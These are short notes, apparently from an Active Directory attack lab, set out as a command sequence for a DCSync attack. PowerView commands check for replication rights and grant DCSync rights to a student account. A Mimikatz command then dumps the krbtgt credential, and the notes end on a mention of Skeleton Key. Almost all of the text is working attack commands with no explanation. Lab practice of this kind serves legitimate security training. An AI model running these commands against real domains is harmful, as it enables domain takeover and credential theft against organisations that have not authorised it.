Check if user has replication rights

Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ? {($_.IdentityReference -match "student648") -and (($_.ObjectType -match 'replication') -or ($_.ActiveDirectoryRights -match 'GenericAll'))}

Adding rights

Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -PrincipalSamAccountName student648 -Rights DCSync -Verbose

Dumping Creds

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\\krbtgt"'

Resources

Skeleton Key